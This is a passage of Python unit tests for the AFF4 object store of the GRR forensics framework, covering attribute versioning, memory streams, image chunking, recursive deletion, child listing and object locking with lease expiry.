self.assertRaises(aff4.BadGetAttributeError, getattr, client.Schema,
"DOESNOTEXIST")
# Check we get the same result from Open
client = aff4.FACTORY.Open(
self.client_id, aff4_grr.VFSGRRClient, mode="rw", token=self.token)
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertRaises(aff4.BadGetAttributeError, getattr, client.Schema,
"DOESNOTEXIST")
# Check we get the same result from MultiOpen
clients = aff4.FACTORY.MultiOpen([self.client_id],
aff4_type=aff4_grr.VFSGRRClient,
mode="rw",
token=self.token)
for client in clients:
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertRaises(aff4.BadGetAttributeError, getattr, client.Schema,
"DOESNOTEXIST")
# Make sure we don't raise if no type specified. No need to check create,
# since a type must always be specified.
client = aff4.FACTORY.Open(self.client_id, mode="rw", token=self.token)
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertEqual(client.Get(client.Schema.DOESNOTEXIST), None)
# Check we get the same result from MultiOpen
clients = aff4.FACTORY.MultiOpen([self.client_id],
mode="rw",
token=self.token)
for client in clients:
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
self.assertEqual(client.Get(client.Schema.DOESNOTEXIST), None)
def testAppendAttribute(self):
"""Test that append attribute works."""
# Create an object to carry attributes
obj = aff4.FACTORY.Create("foobar", aff4.AFF4Object, token=self.token)
obj.Set(obj.Schema.STORED("www.google.com"))
obj.Close()
obj = aff4.FACTORY.Open(
"foobar", mode="rw", token=self.token, age=aff4.ALL_TIMES)
self.assertLen(list(obj.GetValuesForAttribute(obj.Schema.STORED)), 1)
# Add a bunch of attributes now.
for i in range(5):
obj.AddAttribute(obj.Schema.STORED("example.com/%s" % i))
# There should be 6 there now
self.assertLen(list(obj.GetValuesForAttribute(obj.Schema.STORED)), 6)
obj.Close()
# Check that when read back from the data_store we stored them all
obj = aff4.FACTORY.Open("foobar", token=self.token, age=aff4.ALL_TIMES)
self.assertLen(list(obj.GetValuesForAttribute(obj.Schema.STORED)), 6)
def testLastAddedAttributeWinsWhenTimestampsAreEqual(self):
with test_lib.FakeTime(42):
with aff4.FACTORY.Create(
"foobar", aff4.AFF4Object, token=self.token) as obj:
obj.Set(obj.Schema.STORED("foo"))
obj.Set(obj.Schema.STORED("bar"))
obj = aff4.FACTORY.Open("foobar", token=self.token)
self.assertEqual(obj.Get(obj.Schema.STORED), "bar")
def testFlushNewestTime(self):
"""Flush with age policy NEWEST_TIME should only keep a single version."""
# Create an object to carry attributes
obj = aff4.FACTORY.Create("foobar", aff4.AFF4Object, token=self.token)
obj.Set(obj.Schema.STORED("www.google.com"))
obj.Close()
obj = aff4.FACTORY.Open(
"foobar", mode="rw", token=self.token, age=aff4.NEWEST_TIME)
self.assertLen(obj.synced_attributes[obj.Schema.STORED.predicate], 1)
# Add a bunch of attributes now.
for i in range(5):
obj.AddAttribute(obj.Schema.STORED("example.com/%s" % i))
# There should be 5 unsynced versions now
self.assertLen(obj.new_attributes[obj.Schema.STORED.predicate], 5)
obj.Flush()
# When we sync there should be no more unsynced attributes.
self.assertEqual({}, obj.new_attributes)
# But there should only be a single synced attribute since this object has a
# NEWEST_TIME age policy.
self.assertLen(obj.synced_attributes[obj.Schema.STORED.predicate], 1)
# The latest version should be kept.
self.assertEqual(obj.Get(obj.Schema.STORED), "example.com/4")
def testCopyAttributes(self):
# Create an object to carry attributes
obj = aff4.FACTORY.Create("foobar", aff4.AFF4Object, token=self.token)
# Add a bunch of attributes now.
for i in range(5):
obj.AddAttribute(obj.Schema.STORED("example.com/%s" % i))
obj.Close()
obj = aff4.FACTORY.Open(
"foobar", mode="r", token=self.token, age=aff4.ALL_TIMES)
# There should be 5 attributes now
self.assertLen(list(obj.GetValuesForAttribute(obj.Schema.STORED)), 5)
new_obj = aff4.FACTORY.Create(
"new_foobar", aff4.AFF4Object, token=self.token)
new_obj.Copy(new_obj.Schema.STORED, obj, obj.Schema.STORED)
new_obj.Close()
new_obj = aff4.FACTORY.Open(
"new_foobar", mode="r", token=self.token, age=aff4.ALL_TIMES)
# Check that attribute got copied properly
self.assertListEqual(
list(obj.GetValuesForAttribute(obj.Schema.STORED)),
list(new_obj.GetValuesForAttribute(obj.Schema.STORED)))
def testAttributeSet(self):
obj = aff4.FACTORY.Create("foobar", aff4.AFF4Object, token=self.token)
self.assertFalse(obj.IsAttributeSet(obj.Schema.STORED))
obj.Set(obj.Schema.STORED("www.google.com"))
self.assertTrue(obj.IsAttributeSet(obj.Schema.STORED))
obj.Close()
obj = aff4.FACTORY.Open("foobar", token=self.token)
self.assertTrue(obj.IsAttributeSet(obj.Schema.STORED))
def testCreateObject(self):
"""Test that we can create a new object."""
path = "/C.0123456789abcdef/foo/bar/hello.txt"
fd = aff4.FACTORY.Create(path, aff4.AFF4MemoryStream, token=self.token)
fd.Flush()
# Now object is ready for use
fd.Write(b"hello")
fd.Close()
fd = aff4.FACTORY.Open(path, token=self.token)
self.assertEqual(fd.Read(100), b"hello")
# Make sure that we have intermediate objects created.
for path in [
"aff4:/C.0123456789abcdef", "aff4:/C.0123456789abcdef/foo",
"aff4:/C.0123456789abcdef/foo/bar",
"aff4:/C.0123456789abcdef/foo/bar/hello.txt"
]:
fd = aff4.FACTORY.Open(path, token=self.token)
last = fd.Get(fd.Schema.LAST)
self.assertGreater(int(last), 1330354592221974)
def testCreateWithPool(self):
"""Tests that we can create aff4 objects using a pool."""
path1 = "aff4:/test/pool_memory_stream"
path2 = "aff4:/test/pool_memory_stream2"
pool = data_store.DB.GetMutationPool()
for path in [path1, path2]:
fd = aff4.FACTORY.Create(
path,
aff4.AFF4UnversionedMemoryStream,
mode="w",
mutation_pool=pool,
token=self.token)
content = b"TestData" * 10
fd.Write(content)
fd.Close()
# Make sure nothing has been written to the paths we use.
if isinstance(data_store.DB, fake_data_store.FakeDataStore):
# Stronger test that uses fake data store internals.
self.assertIn(path1, path2) # Just so we don't miss anything.
for subject in data_store.DB.subjects:
self.assertNotIn(path1, subject)
else:
self.assertFalse(data_store.DB.ResolveRow(path1))
self.assertFalse(data_store.DB.ResolveRow(path2))
pool.Flush()
self.assertTrue(data_store.DB.ResolveRow(path1))
self.assertTrue(data_store.DB.ResolveRow(path2))
fd = aff4.FACTORY.Open(path1, token=self.token)
self.assertEqual(fd.read(100), content)
def testObjectUpgrade(self):
"""Test that we can create a new object of a different type."""
path = "C.0123456789abcdef"
# Write the first object
with aff4.FACTORY.Create(
path, aff4_grr.VFSGRRClient, token=self.token) as fd:
fd.Set(fd.Schema.HOSTNAME("blah"))
original_fd = fd
# Check it got created
with aff4.FACTORY.Open(path, aff4_grr.VFSGRRClient, token=self.token) as fd:
self.assertEqual(fd.Get(fd.Schema.HOSTNAME), "blah")
self.assertEqual(fd.Get(fd.Schema.TYPE), "VFSGRRClient")
# Overwrite with a new object of different type
with aff4.FACTORY.Create(
path, aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"hello")
# Check that the object is now an AFF4MemoryStream
with aff4.FACTORY.Open(path, aff4.AFF4MemoryStream, token=self.token) as fd:
self.assertEqual(fd.Read(100), b"hello")
self.assertEqual(fd.Get(fd.Schema.TYPE), "AFF4MemoryStream")
self.assertRaises(aff4.BadGetAttributeError, getattr, fd.Schema,
"HOSTNAME")
# Attributes of previous objects are actually still accessible. Some code
# relies on this behaviour so we verify it here.
with aff4.FACTORY.Open(path, token=self.token) as fd:
self.assertEqual(fd.Read(100), b"hello")
self.assertEqual(fd.Get(original_fd.Schema.HOSTNAME), "blah")
def testDelete(self):
"""Check that deleting the object works."""
path = "/C.0123456789abcdef/foo/bar/hello.txt"
fd = aff4.FACTORY.Create(path, aff4.AFF4MemoryStream, token=self.token)
fd.Write(b"hello")
fd.Close()
# Delete the directory and check that the file in it is also removed.
aff4.FACTORY.Delete(os.path.dirname(path), token=self.token)
self.assertRaises(
IOError,
aff4.FACTORY.Open,
path,
aff4.AFF4MemoryStream,
token=self.token)
def testDeleteRaisesWhenTryingToDeleteRoot(self):
self.assertRaises(
ValueError, aff4.FACTORY.Delete, "aff4:/", token=self.token)
def testRecursiveDelete(self):
"""Checks that recusrive deletion of objects works."""
paths_to_delete = [
"aff4:/tmp/dir1/hello1.txt", "aff4:/tmp/dir1/foo/hello2.txt",
"aff4:/tmp/dir1/foo/bar/hello3.txt"
]
safe_paths = ["aff4:/tmp/dir2/hello4.txt"]
for path in paths_to_delete + safe_paths:
with aff4.FACTORY.Create(
path, aff4.AFF4MemoryStream, token=self.token) as fd:
fd.Write(b"hello")
fd = aff4.FACTORY.Open("aff4:/tmp", token=self.token)
self.assertListEqual(
sorted(fd.ListChildren()), ["aff4:/tmp/dir1", "aff4:/tmp/dir2"])
aff4.FACTORY.Delete("aff4:/tmp/dir1", token=self.token)
for path in paths_to_delete:
self.assertRaises(
IOError,
aff4.FACTORY.Open,
path,
aff4.AFF4MemoryStream,
token=self.token)
fd = aff4.FACTORY.Open(os.path.dirname(path), token=self.token)
self.assertFalse(list(fd.ListChildren()))
fd = aff4.FACTORY.Open("aff4:/tmp", token=self.token)
self.assertListEqual(list(fd.ListChildren()), ["aff4:/tmp/dir2"])
fd = aff4.FACTORY.Open("aff4:/tmp/dir2", token=self.token)
self.assertListEqual(list(fd.ListChildren()), ["aff4:/tmp/dir2/hello4.txt"])
def testMultiDeleteRaisesWhenTryingToDeleteRoot(self):
self.assertRaises(
ValueError,
aff4.FACTORY.MultiDelete, ["aff4:/a", "aff4:/"],
token=self.token)
def testMultiDeleteRemovesAllTracesOfObjectsFromDataStore(self):
unique_token = "recursive_delete"
subjects = []
for i in range(5):
for j in range(5):
subjects.append("aff4:" + ("/%s%d" % (unique_token, i)) * (j + 1))
for subject in subjects:
with aff4.FACTORY.Create(subject, aff4.AFF4Volume, token=self.token):
pass
aff4.FACTORY.MultiDelete(
["aff4:/%s%d" % (unique_token, i) for i in range(5)], token=self.token)
if isinstance(data_store.DB, fake_data_store.FakeDataStore):
for subject, subject_data in iteritems(data_store.DB.subjects):
self.assertNotIn(unique_token, subject)
for column_name, values in iteritems(subject_data):
self.assertNotIn(unique_token, column_name)
for value, _ in values:
self.assertNotIn(unique_token, utils.SmartUnicode(value))
else:
for subject in subjects:
self.assertFalse(data_store.DB.ResolveRow(subject))
def testClientObject(self):
fd = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, token=self.token)
# Certs invalid - The RDFX509Cert should check the validity of the cert
self.assertRaises(rdfvalue.DecodeError,
rdf_crypto.RDFX509Cert.FromSerializedString, "My cert")
fd.Close()
def testAFF4MemoryStream(self):
"""Tests the AFF4MemoryStream."""
path = "/C.12345/memorystreamtest"
fd = aff4.FACTORY.Create(path, aff4.AFF4MemoryStream, token=self.token)
self.assertEqual(fd.size, 0)
self.assertEqual(fd.Tell(), 0)
size = 0
for i in range(100):
data = b"Test%08X\n" % i
fd.Write(data)
size += len(data)
self.assertEqual(fd.size, size)
self.assertEqual(fd.Tell(), size)
fd.Close()
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
self.assertEqual(fd.size, size)
self.assertEqual(fd.Tell(), 0)
fd.Seek(size)
self.assertEqual(fd.Tell(), size)
fd.Seek(100)
fd.Write(b"Hello World!")
self.assertEqual(fd.size, size)
fd.Close()
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
self.assertEqual(fd.size, size)
data = fd.Read(size)
self.assertLen(data, size)
self.assertTrue(b"Hello World!" in data)
fd.Close()
def ExerciseAFF4ImageBase(self, classname):
"""Run basic tests on a subclass of AFF4ImageBase."""
path = "/C.12345/aff4image"
with aff4.FACTORY.Create(path, classname, token=self.token) as fd:
fd.SetChunksize(10)
# Make lots of small writes - The length of this string and the chunk size
# are relative primes for worst case.
for i in range(10):
fd.Write(b"Test%08X\n" % i)
with aff4.FACTORY.Open(path, token=self.token) as fd:
for i in range(10):
self.assertEqual(fd.Read(13), b"Test%08X\n" % i)
with aff4.FACTORY.Create(
path, classname, mode="rw", token=self.token) as fd:
fd.Set(fd.Schema._CHUNKSIZE(10))
# Overflow the cache (Cache is 100 chunks, can hold 10*100 bytes).
fd.Write(b"X" * 1100)
self.assertEqual(fd.size, 1100)
# Now rewind a bit and write something.
fd.seek(fd.size - 100)
fd.Write(b"Hello World")
self.assertEqual(fd.size, 1100)
# Now append to the end.
fd.seek(fd.size)
fd.Write(b"Y" * 10)
self.assertEqual(fd.size, 1110)
# And verify everything worked as expected.
fd.seek(997)
data = fd.Read(17)
self.assertEqual(b"XXXHello WorldXXX", data)
fd.seek(1097)
data = fd.Read(6)
self.assertEqual(b"XXXYYY", data)
# Set the max_unbound_read_size to last size of object at path
# before object creation for unbound read() tests.
with test_lib.ConfigOverrider({"Server.max_unbound_read_size": 1110}):
with aff4.FACTORY.Create(
path, classname, mode="rw", token=self.token) as fd:
fd.Set(fd.Schema._CHUNKSIZE(10))
# Verify the unbound read returns 110 bytes
data = fd.read()
self.assertLen(data, 1110)
# Append additional data and retry as oversized unbound read
fd.seek(fd.size)
fd.Write(b"X" * 10)
fd.seek(0)
self.assertRaises(aff4.OversizedRead, fd.read)
def testAFF4Image(self):
self.ExerciseAFF4ImageBase(aff4.AFF4Image)
def testAFF4UnversionedImage(self):
self.ExerciseAFF4ImageBase(aff4.AFF4UnversionedImage)
def testAFF4ImageSize(self):
path = "/C.12345/aff4imagesize"
fd = aff4.FACTORY.Create(path, aff4.AFF4Image, token=self.token)
fd.SetChunksize(10)
size = 0
for i in range(99):
data = b"Test%08X\n" % i
fd.Write(data)
size += len(data)
self.assertEqual(fd.size, size)
fd.Close()
# Check that size is preserved.
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
self.assertEqual(fd.size, size)
# Now append some more data.
fd.seek(fd.size)
for i in range(99):
data = b"Test%08X\n" % i
fd.Write(data)
size += len(data)
self.assertEqual(fd.size, size)
fd.Close()
# Check that size is preserved.
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
self.assertEqual(fd.size, size)
fd.Close()
# Writes in the middle should not change size.
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
fd.Seek(100)
fd.Write(b"Hello World!")
self.assertEqual(fd.size, size)
fd.Close()
# Check that size is preserved.
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
self.assertEqual(fd.size, size)
data = fd.Read(fd.size)
self.assertLen(data, size)
self.assertTrue(b"Hello World!" in data)
fd.Close()
def testAFF4ImageWithFlush(self):
"""Make sure the AFF4Image can survive with partial flushes."""
path = "/C.12345/foo"
self.WriteImage(path, b"Test")
fd = aff4.FACTORY.Open(path, token=self.token)
for i in range(100):
self.assertEqual(fd.Read(13), b"Test%08X\n" % i)
def WriteImage(self,
path,
prefix=b"Test",
timestamp=0,
classname=aff4.AFF4Image):
with utils.Stubber(time, "time", lambda: timestamp):
fd = aff4.FACTORY.Create(path, classname, mode="w", token=self.token)
timestamp += 1
fd.SetChunksize(10)
# Make lots of small writes - The length of this string and the chunk size
# are relative primes for worst case.
for i in range(100):
fd.Write(b"%s%08X\n" % (prefix, i))
# Flush after every write.
fd.Flush()
# And advance the time.
timestamp += 1
fd.Close()
def testAFF4ImageWithVersioning(self):
"""Make sure the AFF4Image can do multiple versions."""
path = "/C.12345/foowithtime"
self.WriteImage(path, b"Time1", timestamp=1000)
# Write a newer version.
self.WriteImage(path, b"Time2", timestamp=2000)
fd = aff4.FACTORY.Open(path, token=self.token, age=(0, 1150 * 1e6))
for i in range(100):
s = b"Time1%08X\n" % i
self.assertEqual(fd.Read(len(s)), s)
fd = aff4.FACTORY.Open(path, token=self.token, age=(0, 2250 * 1e6))
for i in range(100):
s = b"Time2%08X\n" % i
self.assertEqual(fd.Read(len(s)), s)
def testAFF4ImageWithoutVersioning(self):
"""Make sure the AFF4UnversionedImage does not do multiple versions."""
path = "/C.12345/foowithtime"
self.WriteImage(
path, b"Time1", timestamp=1000, classname=aff4.AFF4UnversionedImage)
# Write a newer version.
self.WriteImage(
path, b"Time2", timestamp=2000, classname=aff4.AFF4UnversionedImage)
fd = aff4.FACTORY.Open(path, token=self.token, age=(0, 1150 * 1e6))
for i in range(100):
s = b"Time2%08X\n" % i
self.assertEqual(fd.Read(len(s)), s)
fd = aff4.FACTORY.Open(path, token=self.token, age=(0, 2250 * 1e6))
for i in range(100):
s = b"Time2%08X\n" % i
self.assertEqual(fd.Read(len(s)), s)
def testAFF4ImageContentLastUpdated(self):
"""Make sure CONTENT_LAST gets updated only when content is written."""
path = "/C.12345/contentlastchecker"
self.WriteImage(path, timestamp=1)
fd = aff4.FACTORY.Open(path, token=self.token)
# Make sure the attribute was written when the write occured.
self.assertEqual(int(fd.GetContentAge()), 101000000)
# Write the image again, later in time.
self.WriteImage(path, timestamp=2)
fd = aff4.FACTORY.Open(path, token=self.token)
self.assertEqual(int(fd.GetContentAge()), 102000000)
def testAFF4FlowObject(self):
"""Test the AFF4 Flow object."""
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, token=self.token)
client.Close()
# Start some new flows on it
session_ids = []
for _ in range(10):
session_ids.append(
flow.StartAFF4Flow(
client_id=self.client_id,
flow_name=flow_test_lib.FlowOrderTest.__name__,
token=self.token))
# Try to open a single flow.
flow_obj = aff4.FACTORY.Open(session_ids[0], mode="r", token=self.token)
self.assertEqual(flow_obj.runner_args.flow_name,
flow_test_lib.FlowOrderTest.__name__)
self.assertEqual(flow_obj.session_id, session_ids[0])
self.assertEqual(flow_obj.__class__.__name__,
flow_test_lib.FlowOrderTest.__name__)
def testMultiOpen(self):
root_urn = aff4.ROOT_URN.Add("path")
f = aff4.FACTORY.Create(
root_urn.Add("some1"), aff4.AFF4Volume, token=self.token)
f.Close()
f = aff4.FACTORY.Create(
root_urn.Add("some2"), aff4.AFF4Volume, token=self.token)
f.Close()
root = aff4.FACTORY.Open(root_urn, token=self.token)
all_children = list(aff4.FACTORY.MultiOpen(root.ListChildren()))
self.assertListEqual(
sorted([x.urn for x in all_children]),
[root_urn.Add("some1"), root_urn.Add("some2")])
def testMultiOpenOrdered(self):
foo_urn = aff4.ROOT_URN.Add("foo")
with aff4.FACTORY.Create(
foo_urn, aff4_type=aff4.AFF4MemoryStream, token=self.token) as filedesc:
filedesc.Write(b"FOO")
bar_urn = aff4.ROOT_URN.Add("bar")
with aff4.FACTORY.Create(
bar_urn, aff4_type=aff4.AFF4MemoryStream, token=self.token) as filedesc:
filedesc.Write(b"BAR")
baz_urn = aff4.ROOT_URN.Add("baz")
with aff4.FACTORY.Create(
baz_urn, aff4_type=aff4.AFF4MemoryStream, token=self.token) as filedesc:
filedesc.Write(b"BAZ")
filedescs = list(aff4.FACTORY.MultiOpenOrdered([foo_urn, bar_urn, baz_urn]))
self.assertLen(filedescs, 3)
self.assertEqual(filedescs[0].Read(1337), b"FOO")
self.assertEqual(filedescs[1].Read(1337), b"BAR")
self.assertEqual(filedescs[2].Read(1337), b"BAZ")
def testMultiOpenOrderedNonExistingObject(self):
foo_urn = aff4.ROOT_URN.Add("foo")
bar_urn = aff4.ROOT_URN.Add("bar")
with aff4.FACTORY.Create(
foo_urn, aff4_type=aff4.AFF4MemoryStream, token=self.token) as filedesc:
del filedesc # Unused.
with self.assertRaisesRegexp(IOError, "bar"):
aff4.FACTORY.MultiOpenOrdered([foo_urn, bar_urn], token=self.token)
def testObjectListChildren(self):
root_urn = aff4.ROOT_URN.Add("path")
f = aff4.FACTORY.Create(
root_urn.Add("some1"), aff4.AFF4Volume, token=self.token)
f.Close()
f = aff4.FACTORY.Create(
root_urn.Add("some2"), aff4.AFF4Volume, token=self.token)
f.Close()
root = aff4.FACTORY.Open(root_urn, token=self.token)
all_children = sorted(list(root.ListChildren()))
self.assertListEqual(
sorted(all_children),
[root_urn.Add("some1"), root_urn.Add("some2")])
def testMultiListChildren(self):
client1_urn = rdfvalue.RDFURN("C.%016X" % 0)
client2_urn = rdfvalue.RDFURN("C.%016X" % 1)
with aff4.FACTORY.Create(
client1_urn.Add("some1"), aff4.AFF4Volume, token=self.token):
pass
with aff4.FACTORY.Create(
client2_urn.Add("some2"), aff4.AFF4Volume, token=self.token):
pass
children = dict(aff4.FACTORY.MultiListChildren([client1_urn, client2_urn]))
self.assertListEqual(sorted(iterkeys(children)), [client1_urn, client2_urn])
self.assertListEqual(children[client1_urn], [client1_urn.Add("some1")])
self.assertListEqual(children[client2_urn], [client2_urn.Add("some2")])
def testFactoryListChildren(self):
client_urn = rdfvalue.RDFURN("C.%016X" % 0)
with aff4.FACTORY.Create(
client_urn.Add("some1"), aff4.AFF4Volume, token=self.token):
pass
with aff4.FACTORY.Create(
client_urn.Add("some2"), aff4.AFF4Volume, token=self.token):
pass
children = aff4.FACTORY.ListChildren(client_urn)
self.assertListEqual(
sorted(children), [client_urn.Add("some1"),
client_urn.Add("some2")])
def testIndexNotUpdatedWhenWrittenWithinIntermediateCacheAge(self):
with utils.Stubber(time, "time", lambda: 100):
fd = aff4.FACTORY.Create(
self.client_id.Add("parent").Add("child1"),
aff4_type=aff4.AFF4Volume,
token=self.token)
fd.Close()
fd = aff4.FACTORY.Open(self.client_id, token=self.token)
children = list(fd.ListChildren())
self.assertLen(children, 1)
self.assertEqual(children[0].age,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100))
latest_time = 100 + aff4.FACTORY.intermediate_cache_age - 1
with utils.Stubber(time, "time", lambda: latest_time):
fd = aff4.FACTORY.Create(
self.client_id.Add("parent").Add("child2"),
aff4_type=aff4.AFF4Volume,
token=self.token)
fd.Close()
fd = aff4.FACTORY.Open(self.client_id, token=self.token)
children = list(fd.ListChildren())
self.assertLen(children, 1)
self.assertEqual(children[0].age,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100))
def testIndexUpdatedWhenWrittenAfterIntemediateCacheAge(self):
with utils.Stubber(time, "time", lambda: 100):
fd = aff4.FACTORY.Create(
self.client_id.Add("parent").Add("child1"),
aff4_type=aff4.AFF4Volume,
token=self.token)
fd.Close()
fd = aff4.FACTORY.Open(self.client_id, token=self.token)
children = list(fd.ListChildren())
self.assertLen(children, 1)
self.assertEqual(children[0].age,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100))
latest_time = 100 + aff4.FACTORY.intermediate_cache_age + 1
with utils.Stubber(time, "time", lambda: latest_time):
fd = aff4.FACTORY.Create(
self.client_id.Add("parent").Add("child2"),
aff4_type=aff4.AFF4Volume,
token=self.token)
fd.Close()
fd = aff4.FACTORY.Open(self.client_id, token=self.token)
children = list(fd.ListChildren())
self.assertLen(children, 1)
self.assertEqual(children[0].age,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(latest_time))
def testClose(self):
"""Ensure that closed objects can not be used again."""
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Close()
self.assertRaises(IOError, client.Get, client.Schema.HOSTNAME)
self.assertRaises(IOError, client.Set, client.Schema.HOSTNAME("hello"))
def testVersionOrder(self):
"""Test that GetValuesForAttribute returns versions in the right order."""
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("Host1"))
client.Flush()
client.Set(client.Schema.HOSTNAME("Host2"))
client.Flush()
# Get() returns the most recent version.
self.assertEqual(client.Get(client.Schema.HOSTNAME), "Host2")
client = aff4.FACTORY.Open(
self.client_id, token=self.token, age=aff4.ALL_TIMES)
# Versioned attributes must be returned in most recent order first.
self.assertEqual(
list(client.GetValuesForAttribute(client.Schema.HOSTNAME)),
["Host2", "Host1"])
# Get() returns the most recent version.
self.assertEqual(client.Get(client.Schema.HOSTNAME), "Host2")
def testAsynchronousOpenWithLockWorksCorrectly(self):
self.client_id = rdfvalue.RDFURN(self.client_id)
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
with aff4.FACTORY.OpenWithLock(self.client_id, token=self.token) as obj1:
# Check that the object is correctly opened by reading the attribute
self.assertEqual(obj1.Get(obj1.Schema.HOSTNAME), "client1")
def TryOpen():
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False):
pass
# This should raise, because obj1 is holding the lock
self.assertRaises(aff4.LockError, TryOpen)
# This shouldn't raise now, as previous Close() call has released the lock.
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False):
pass
def testAsynchronousCreateWithLock(self):
self.client_id = rdfvalue.RDFURN(self.client_id)
with aff4.FACTORY.CreateWithLock(
self.client_id, aff4_grr.VFSGRRClient, token=self.token) as obj:
obj.Set(obj.Schema.HOSTNAME("client1"))
def TryOpen():
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False):
pass
# This should raise, because obj1 is holding the lock
self.assertRaises(aff4.LockError, TryOpen)
# This shouldn't raise now, as previous Close() call has released the lock.
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False) as obj:
# Check that the object is correctly opened by reading the attribute
self.assertEqual(obj.Get(obj.Schema.HOSTNAME), "client1")
def testSynchronousOpenWithLockWorksCorrectly(self):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
t_state = {
"parallel_thread_got_lock": False,
"parallel_thread_raised": False
}
def ParallelThread():
try:
# Using blocking_lock_timeout of 10 minutes to avoid possible
# timeouts when running tests on slow hardware.
with aff4.FACTORY.OpenWithLock(
self.client_id,
token=self.token,
blocking=True,
blocking_sleep_interval=0,
blocking_lock_timeout=600):
pass
t_state["parallel_thread_got_lock"] = True
except Exception: # pylint: disable=broad-except
# Catching all the exceptions, because exceptions raised in threads
# do not cause the test to fail - threads just die silently.
t_state["parallel_thread_raised"] = True
t = threading.Thread(target=ParallelThread)
with aff4.FACTORY.OpenWithLock(self.client_id, token=self.token) as obj1:
# Check that the object is correctly opened by reading the attribute
self.assertEqual(obj1.Get(obj1.Schema.HOSTNAME), "client1")
t.start()
time.sleep(0.1)
# At this point, the thread should be attemting getting the lock.
self.assertFalse(t_state["parallel_thread_got_lock"])
self.assertFalse(t_state["parallel_thread_raised"])
# We released the lock, so now the thread should finally get it,
# release it, and die.
t.join()
self.assertTrue(t_state["parallel_thread_got_lock"])
self.assertFalse(t_state["parallel_thread_raised"])
def testSynchronousOpenWithLockTimesOutCorrectly(self):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
with aff4.FACTORY.OpenWithLock(self.client_id, token=self.token) as obj1:
# Check that the object is correctly opened by reading the attribute
self.assertEqual(obj1.Get(obj1.Schema.HOSTNAME), "client1")
def TryOpen():
with aff4.FACTORY.OpenWithLock(
self.client_id,
token=self.token,
blocking=True,
blocking_lock_timeout=0.1,
blocking_sleep_interval=0.1):
pass
self.assertRaises(aff4.LockError, TryOpen)
def testLockHasLimitedLeaseTime(self):
with test_lib.FakeTime(100):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
with self.assertRaises(aff4.LockError):
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, lease_time=100) as fd:
def TryOpen():
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False):
pass
time.time = lambda: 150
self.assertRaises(aff4.LockError, TryOpen)
# This shouldn't raise, because previous lock's lease has expired
time.time = lambda: 201
TryOpen()
self.assertRaises(aff4.LockError, fd.Close)
self.assertRaises(aff4.LockError, fd.Flush)
def testUpdateLeaseRaisesIfObjectIsNotLocked(self):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
client = aff4.FACTORY.Open(self.client_id, token=self.token)
self.assertRaises(aff4.LockError, client.UpdateLease, 100)
def testUpdateLeaseRaisesIfLeaseHasExpired(self):
with test_lib.FakeTime(100):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
try:
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, lease_time=100) as fd:
time.time = lambda: 250
self.assertRaises(aff4.LockError, fd.UpdateLease, 100)
except aff4.LockError:
# LockContextManager.__exit__ calls Close(), which calls Flush(),
# which calls CheckLease(), which raises LockError because the lease
# time has expired. Ignoring this exception.
pass
def testCheckLease(self):
with test_lib.FakeTime(100):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
with self.assertRaises(aff4.LockError):
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, lease_time=300) as fd:
self.assertTrue(fd.CheckLease())
time.time = lambda: 500
self.assertEqual(fd.CheckLease(), 0)
def testUpdateLeaseWorksCorrectly(self):
with test_lib.FakeTime(100):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, lease_time=100) as fd:
fd.UpdateLease(200)
time.time = lambda: 250
# If lease is updated correctly, object can't be OpenedWithLock again,
# because it's already locked and lease hasn't expired.
def TryOpen():
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False):
pass
self.assertRaises(aff4.LockError, TryOpen)
def testLockProtectedAttributesWorkCorrectly(self):
obj = aff4.FACTORY.Create(
